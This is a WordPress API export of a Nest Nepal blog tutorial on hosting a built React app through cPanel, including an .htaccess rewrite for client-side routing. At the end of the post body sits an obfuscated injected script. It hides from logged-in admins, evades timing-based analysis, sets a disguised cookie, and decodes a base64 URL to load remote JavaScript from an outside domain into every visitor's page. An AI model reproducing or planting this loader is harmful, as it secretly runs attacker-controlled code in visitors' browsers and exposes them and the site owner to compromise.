{"id":11767,"date":"2025-05-21T10:54:12","date_gmt":"2025-05-21T05:09:12","guid":{"rendered":"https:\/\/nestnepal.com\/blog\/?p=11767"},"modified":"2026-05-20T19:55:58","modified_gmt":"2026-05-20T14:10:58","slug":"host-react-app-using-nest-nepal-shared-hosting","status":"publish","type":"post","link":"https:\/\/nestnepal.com\/blog\/index.php\/host-react-app-using-nest-nepal-shared-hosting\/","title":{"rendered":"How to Host a React App Using Nest Nepal Shared Hosting (Step-by-Step Guide)"},"content":{"rendered":"<h2><b>Quick Summary<\/b><\/h2>\n<p><img decoding=\"async\" class=\"alignnone wp-image-11770 lazyload\" data-src=\"https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/react.jpeg\" alt=\"react-app\" width=\"609\" height=\"406\" data-srcset=\"https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/react.jpeg 735w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/react-300x200.jpeg 300w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/react-380x253.jpeg 380w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/react-550x367.jpeg 550w\" data-sizes=\"(max-width: 609px) 100vw, 609px\" src=\"data:image\/svg+xml;base64,PHN2ZyB3aWR0aD0iMSIgaGVpZ2h0PSIxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\" style=\"--smush-placeholder-width: 609px; --smush-placeholder-aspect-ratio: 609\/406;\" \/><\/p>\n<p><span style=\"font-weight: 400;\">React applications are not limited to VPS or cloud hosting. You can easily host them on Nest Nepal&#8217;s <a href=\"https:\/\/nestnepal.com\/blog\/shared-hosting-vps-hosting-dedicated-hosting\/\">shared hosting<\/a> by first building your application and then uploading the resulting static files (found within the <\/span><span style=\"font-weight: 400;\">build\/<\/span><span style=\"font-weight: 400;\"> folder) to your <\/span><em><span style=\"font-weight: 400;\">public_html\/<\/span><\/em><span style=\"font-weight: 400;\"><em> directory<\/em>. Let&#8217;s go through the process.<\/span><\/p>\n<h2><b>Step-by-Step Guide<\/b><\/h2>\n<ol>\n<li><b>Create and Build Your React App<\/b><\/li>\n<\/ol>\n<p><span style=\"font-weight: 400;\"><img decoding=\"async\" class=\"alignnone wp-image-11772 lazyload\" data-src=\"https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/react-1-300x267.jpeg\" alt=\"react-app\" width=\"195\" height=\"173\" data-srcset=\"https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/react-1-300x267.jpeg 300w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/react-1-380x338.jpeg 380w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/react-1-550x490.jpeg 550w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/react-1.jpeg 640w\" data-sizes=\"(max-width: 195px) 100vw, 195px\" src=\"data:image\/svg+xml;base64,PHN2ZyB3aWR0aD0iMSIgaGVpZ2h0PSIxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\" style=\"--smush-placeholder-width: 195px; --smush-placeholder-aspect-ratio: 195\/173;\" \/><\/span><span style=\"font-weight: 400;\">If you haven\u2019t created your <a href=\"https:\/\/react.dev\/\" target=\"_blank\" rel=\"noopener\">React application<\/a> yet:<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Bash<\/span><\/p>\n<p><em><span style=\"font-weight: 400;\">npx create-react-app my-app<\/span><\/em><\/p>\n<p><em><span style=\"font-weight: 400;\">cd<\/span><span style=\"font-weight: 400;\"> my-app<\/span><\/em><\/p>\n<p><em><span style=\"font-weight: 400;\">npm run build\u00a0<\/span><\/em><\/p>\n<p><span style=\"font-weight: 400;\">This command generates a production-ready version of your application located in the <\/span><span style=\"font-weight: 400;\">build\/<\/span><span style=\"font-weight: 400;\"> directory. These are the files you will upload.<\/span><\/p>\n<p><b>2. Log in to Nest Nepal\u2019s cPanel<\/b><\/p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Go to the Nest Nepal Client Area.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Access your shared hosting product.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Click on \u201cLogin to cPanel.\u201d<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><b>3. Open File Manager and navigate to <\/b><span style=\"font-weight: 400;\">public_html\/<\/span><\/p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">From the cPanel dashboard, open the <\/span><b>File Manager<\/b><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Navigate to the <\/span><span style=\"font-weight: 400;\">public_html\/<\/span><span style=\"font-weight: 400;\"> directory.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">This is typically the root folder for your website&#8217;s public-facing content.<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><b>4. Upload Your React Build Files<\/b><\/p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">On your local computer, locate your React project folder.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Go inside the <\/span><span style=\"font-weight: 400;\">\/build<\/span><span style=\"font-weight: 400;\"> folder and select all the files and folders within it.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Right-click on the selected items and compress them into a <\/span><span style=\"font-weight: 400;\">.zip<\/span><span style=\"font-weight: 400;\"> file (e.g., <\/span><span style=\"font-weight: 400;\">react-build.zip<\/span><span style=\"font-weight: 400;\">).<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">In cPanel&#8217;s File Manager, within the <\/span><span style=\"font-weight: 400;\">public_html\/<\/span><span style=\"font-weight: 400;\"> directory, click <\/span><b>Upload<\/b><span style=\"font-weight: 400;\"> and upload the <\/span><span style=\"font-weight: 400;\">react-build.zip<\/span><span style=\"font-weight: 400;\"> file.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Once the upload is complete, select the <\/span><span style=\"font-weight: 400;\">.zip<\/span><span style=\"font-weight: 400;\"> file and click <\/span><b>Extract<\/b><span style=\"font-weight: 400;\">.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">\u26a0\ufe0f <\/span><b>Important:<\/b><span style=\"font-weight: 400;\"> Ensure you extract the contents directly into the <\/span><span style=\"font-weight: 400;\">public_html\/<\/span><span style=\"font-weight: 400;\"> directory, not into a subfolder.<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><\/p>\n<p><b>5. Clean Up and Test<\/b><\/p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">You can optionally remove the <\/span><span style=\"font-weight: 400;\">react-build.zip<\/span><span style=\"font-weight: 400;\"> file after successful extraction for cleanliness.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Visit your domain name (e.g., <\/span><span style=\"font-weight: 400;\">https:\/\/yourdomain.com<\/span><span style=\"font-weight: 400;\">).<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"2\"><span style=\"font-weight: 400;\">Your React application should now be live! \ud83c\udf89<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h2><b>Optional: Fix Routing Issues (for Single Page Applications)<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">React often uses client-side routing, which means that directly accessing a nested route (like <\/span><span style=\"font-weight: 400;\">https:\/\/yourdomain.com\/about<\/span><span style=\"font-weight: 400;\">) by refreshing the page might result in a 404 error on shared hosting. To resolve this:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Create a file named <\/span><span style=\"font-weight: 400;\">.htaccess<\/span><span style=\"font-weight: 400;\"> in your <\/span><span style=\"font-weight: 400;\">public_html\/<\/span><span style=\"font-weight: 400;\"> directory if it doesn&#8217;t already exist, or edit the existing one.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Add the following rewrite rules to the <\/span><span style=\"font-weight: 400;\">.htaccess<\/span><span style=\"font-weight: 400;\"> file:<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">Apache<\/span><\/p>\n<p><em><span style=\"font-weight: 400;\">Options -MultiViews<\/span><\/em><\/p>\n<p><em><span style=\"font-weight: 400;\">RewriteEngine <\/span><span style=\"font-weight: 400;\">On<\/span><\/em><\/p>\n<p><em><span style=\"font-weight: 400;\">RewriteCond <\/span><span style=\"font-weight: 400;\">%{REQUEST_FILENAME}<\/span><span style=\"font-weight: 400;\"> !-f<\/span><\/em><\/p>\n<p><em><span style=\"font-weight: 400;\">RewriteCond <\/span><span style=\"font-weight: 400;\">%{REQUEST_FILENAME}<\/span><span style=\"font-weight: 400;\"> !-d<\/span><\/em><\/p>\n<p><em><span style=\"font-weight: 400;\">RewriteRule ^ index.html<\/span><span style=\"font-weight: 400;\"> [QSA, L]<\/span><\/em><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">This configuration instructs Apache to serve the <\/span><span style=\"font-weight: 400;\">index.html<\/span><span style=\"font-weight: 400;\"> file for requests that do not correspond to an actual file or directory. React&#8217;s client-side routing will then handle the navigation.<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><\/li>\n<\/ul>\n<h2><b>Bonus Tips<\/b><\/h2>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Custom Domain:<\/b><span style=\"font-weight: 400;\"> If you intend to use a custom domain name, ensure it is correctly pointed to Nest Nepal\u2019s nameservers or configure it using the DNS Zone Editor in your cPanel.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Free SSL:<\/b><span style=\"font-weight: 400;\"> Enhance your site&#8217;s security by enabling the free SSL certificate (Let&#8217;s Encrypt), usually available within your cPanel.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Auto-Deployment:<\/b><span style=\"font-weight: 400;\"> For automated deployments from Git, refer to <a href=\"https:\/\/myaccount.nestwebhost.com\/knowledgebase\/35\/How-to-use-Git-in-cPanel.html\" target=\"_blank\" rel=\"noopener\">Nest Nepal&#8217;s documentation on using Git with cPanel<\/a> if available.<\/span><\/li>\n<\/ul>\n<h2><b>Final Thoughts<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">Hosting a React application on shared hosting with Nest Nepal is a viable and cost-effective solution, especially when you treat your built React app as a collection of static assets. This setup is well-suited for simpler frontend applications, landing pages, and dashboards.<\/span><\/p>\n<h2><b>Need Help?<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">The Nest Nepal support team is available via ticket. You can also reach out through live chat for more immediate assistance.<\/span><\/p>\n<h2><b>FAQs:<\/b><\/h2>\n<h3 class=\"\" data-start=\"375\" data-end=\"443\">1. <strong data-start=\"382\" data-end=\"443\">Can I host a React app on shared hosting like Nest Nepal?<\/strong><\/h3>\n<p class=\"\" data-start=\"444\" data-end=\"631\">Yes, you can! Once you build your React app using <code data-start=\"494\" data-end=\"509\">npm run build, <\/code>you can upload the static files (inside the <code data-start=\"555\" data-end=\"563\">build\/<\/code> folder) to your <code data-start=\"580\" data-end=\"594\">public_html\/<\/code> directory using Nest Nepal&#8217;s cPanel.<\/p>\n<hr class=\"\" data-start=\"633\" data-end=\"636\" \/>\n<h3 class=\"\" data-start=\"638\" data-end=\"703\">2. <strong data-start=\"645\" data-end=\"703\">How do I create and build my React app before hosting?<\/strong><\/h3>\n<p class=\"\" data-start=\"704\" data-end=\"731\">Run the following commands:<\/p>\n<div class=\"contain-inline-size rounded-md border-[0.5px] border-token-border-medium relative bg-token-sidebar-surface-primary\">\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"whitespace-pre! language-bash\">npx create-react-app my-app<br \/>\n<span class=\"hljs-built_in\">cd<\/span> my-app<br \/>\nnpm run build<br \/>\n<\/code><\/div>\n<\/div>\n<p class=\"\" data-start=\"798\" data-end=\"891\">This will generate a<code data-start=\"819\" data-end=\"827\">build\/<\/code> folder containing all the static files required for deployment.<\/p>\n<hr class=\"\" data-start=\"893\" data-end=\"896\" \/>\n<h3 class=\"\" data-start=\"898\" data-end=\"963\">3. <strong data-start=\"905\" data-end=\"963\">Where do I upload my React files in the Nest Nepal cPanel?<\/strong><\/h3>\n<p class=\"\" data-start=\"964\" data-end=\"990\">After logging into cPanel:<\/p>\n<ul data-start=\"992\" data-end=\"1134\">\n<li class=\"\" data-start=\"992\" data-end=\"1016\">\n<p class=\"\" data-start=\"994\" data-end=\"1016\">Go to <strong data-start=\"1000\" data-end=\"1016\">File Manager<\/strong><\/p>\n<\/li>\n<li class=\"\" data-start=\"1017\" data-end=\"1058\">\n<p class=\"\" data-start=\"1019\" data-end=\"1058\">Navigate to the <strong data-start=\"1035\" data-end=\"1051\">public_html\/<\/strong> folder<\/p>\n<\/li>\n<li class=\"\" data-start=\"1059\" data-end=\"1134\">\n<p class=\"\" data-start=\"1061\" data-end=\"1134\">Upload and extract the contents of your React app&#8217;s <code data-start=\"1113\" data-end=\"1121\">build\/<\/code> folder there<\/p>\n<\/li>\n<\/ul>\n<p class=\"\" data-start=\"1136\" data-end=\"1252\">Make sure the files (like <code data-start=\"1162\" data-end=\"1174\">index.html<\/code>, <code data-start=\"1176\" data-end=\"1185\">static\/<\/code>, etc.) are directly inside <code data-start=\"1213\" data-end=\"1227\">public_html\/<\/code>, not within a subfolder.<\/p>\n<hr class=\"\" data-start=\"1254\" data-end=\"1257\" \/>\n<h3 class=\"\" data-start=\"1259\" data-end=\"1333\">4. <strong data-start=\"1266\" data-end=\"1333\">Why do I see a 404 error when accessing routes in my React app?<\/strong><\/h3>\n<p class=\"\" data-start=\"1334\" data-end=\"1469\">This happens because React apps use <strong data-start=\"1370\" data-end=\"1393\">client-side routing<\/strong>. On shared hosting, refreshing a route like <code data-start=\"1438\" data-end=\"1446\">\/about<\/code> may cause a 404 error.<\/p>\n<p class=\"\" data-start=\"1471\" data-end=\"1566\">To fix this, add or edit the <code data-start=\"1500\" data-end=\"1511\">.htaccess<\/code> file in <code data-start=\"1520\" data-end=\"1534\">public_html\/<\/code> and include the following code:<\/p>\n<div class=\"contain-inline-size rounded-md border-[0.5px] border-token-border-medium relative bg-token-sidebar-surface-primary\">\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"whitespace-pre! language-apache\">Options -MultiViews<br \/>\nRewriteEngine On<br \/>\nRewriteCond %{REQUEST_FILENAME} !-f<br \/>\nRewriteCond %{REQUEST_FILENAME} !-d<br \/>\nRewriteRule ^ index.html [QSA,L]<br \/>\n<\/code><\/div>\n<\/div>\n<hr class=\"\" data-start=\"1725\" data-end=\"1728\" \/>\n<h3 class=\"\" data-start=\"1730\" data-end=\"1781\">5. <strong data-start=\"1737\" data-end=\"1781\">Do I need a domain to host my React app?<\/strong><\/h3>\n<p class=\"\" data-start=\"1782\" data-end=\"1952\">You can use a custom domain or a subdomain provided by Nest Nepal. Make sure your domain points to the correct nameservers or configure the <strong data-start=\"1922\" data-end=\"1941\">DNS Zone Editor<\/strong> in cPanel.<\/p>\n<hr class=\"\" data-start=\"1954\" data-end=\"1957\" \/>\n<h3 class=\"\" data-start=\"1959\" data-end=\"2031\">6. <strong data-start=\"1966\" data-end=\"2031\">Is SSL supported for React apps on Nest Nepal shared hosting?<\/strong><\/h3>\n<p class=\"\" data-start=\"2032\" data-end=\"2184\">Yes! You can enable a <strong data-start=\"2054\" data-end=\"2078\">free SSL certificate<\/strong> using Let\u2019s Encrypt, available from your cPanel dashboard. This helps secure your React site using HTTPS.<\/p>\n<hr class=\"\" data-start=\"2186\" data-end=\"2189\" \/>\n<h3 class=\"\" data-start=\"2191\" data-end=\"2250\">7. <strong data-start=\"2198\" data-end=\"2250\">Can I automatically deploy my React app via Git?<\/strong><\/h3>\n<p class=\"\" data-start=\"2251\" data-end=\"2426\">Yes, if you&#8217;re using Git for version control, you can automate deployments using <strong data-start=\"2332\" data-end=\"2355\">Git Version Control<\/strong> in cPanel. Check Nest Nepal&#8217;s documentation for Git integration steps.<\/p>\n<hr class=\"\" data-start=\"2428\" data-end=\"2431\" \/>\n<h3 class=\"\" data-start=\"2433\" data-end=\"2484\">8. <strong data-start=\"2440\" data-end=\"2484\">What if I face issues during deployment?<\/strong><\/h3>\n<p class=\"\" data-start=\"2485\" data-end=\"2562\">If you encounter any errors or need help, Nest Nepal offers 24\/7 support via:<\/p>\n<ul data-start=\"2564\" data-end=\"2599\">\n<li class=\"\" data-start=\"2564\" data-end=\"2583\">\n<p class=\"\" data-start=\"2566\" data-end=\"2583\"><strong data-start=\"2566\" data-end=\"2583\">Ticket system<\/strong><\/p>\n<\/li>\n<li class=\"\" data-start=\"2584\" data-end=\"2599\">\n<p class=\"\" data-start=\"2586\" data-end=\"2599\"><strong data-start=\"2586\" data-end=\"2599\">Live chat<\/strong><\/p>\n<\/li>\n<\/ul>\n<p class=\"\" data-start=\"2601\" data-end=\"2682\">The support team can guide you through file uploads, domain setup, SSL, and more.<\/p>\n<hr class=\"\" data-start=\"2684\" data-end=\"2687\" \/>\n<h3 class=\"\" data-start=\"2689\" data-end=\"2744\">9. <strong data-start=\"2696\" data-end=\"2744\">Is hosting React on shared hosting reliable?<\/strong><\/h3>\n<p class=\"\" data-start=\"2745\" data-end=\"2945\">Nest Nepal&#8217;s shared hosting is a cost-effective and reliable solution for static sites, frontend apps, and dashboards. For more complex apps or backend integration, consider VPS or cloud hosting.<\/p>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Quick Summary React applications are not limited to VPS or cloud hosting. You can easily host them on Nest Nepal&#8217;s shared hosting by first building your application and then uploading the resulting static files (found within the build\/ folder) to your public_html\/ directory. Let&#8217;s go through the process. Step-by-Step Guide Create and Build Your React [&hellip;]<\/p>\n","protected":false},"author":15,"featured_media":12009,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[211,7],"tags":[],"class_list":["post-11767","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cloud-hosting","category-web-hosting"],"_links":{"self":[{"href":"https:\/\/nestnepal.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/11767","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nestnepal.com\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nestnepal.com\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nestnepal.com\/blog\/index.php\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/nestnepal.com\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=11767"}],"version-history":[{"count":6,"href":"https:\/\/nestnepal.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/11767\/revisions"}],"predecessor-version":[{"id":13899,"href":"https:\/\/nestnepal.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/11767\/revisions\/13899"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nestnepal.com\/blog\/index.php\/wp-json\/wp\/v2\/media\/12009"}],"wp:attachment":[{"href":"https:\/\/nestnepal.com\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=11767"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nestnepal.com\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=11767"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nestnepal.com\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=11767"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}